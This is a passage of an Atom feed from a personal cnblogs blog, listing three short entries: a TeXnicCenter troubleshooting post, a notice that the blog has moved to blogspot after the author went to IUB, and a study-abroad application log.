...</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2009/02/08/1386126.html</id><title type="text">some problems with texniccenter</title><summary type="text">Finally, I've decided to split my blog into a daily-life one and a technical one. In that case, this blog is kept updated on my findings and thoughts of technical problems.Actually, I met some strange...</summary><published>2009-02-07T20:51:00Z</published><updated>2009-02-07T20:51:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2009/02/08/1386126.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2009/02/08/1386126.html"/><content type="text">Finally, I've decided to split my blog into a daily-life one and a technical one. In that case, this blog is kept updated on my findings and thoughts of technical problems.Actually, I met some strange...</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2008/11/01/1324206.html</id><title type="text">blog转移</title><summary type="text">人已在米国IUB，blog转移至http://lzcarl.blogspot.com，定期更新。</summary><published>2008-11-01T04:51:00Z</published><updated>2008-11-01T04:51:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2008/11/01/1324206.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2008/11/01/1324206.html"/><content type="text">人已在米国IUB，blog转移至http://lzcarl.blogspot.com，定期更新。</content></entry><entry><id>http://www.cnblogs.com/lzcarl/archive/2008/03/09/1096996.html</id><title type="text">留学申请流水帐</title><summary type="text">留学申请流水帐</summary><published>2008-03-08T17:10:00Z</published><updated>2008-03-08T17:10:00Z</updated><author><name>coordinator</name><uri>http://www.cnblogs.com/lzcarl/</uri></author><link rel="alternate" href="http://www.cnblogs.com/lzcarl/archive/2008/03/09/1096996.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/lzcarl/archive/2008/03/09/1096996.html"/><content type="text">留学申请流水帐</content></entry></feed>
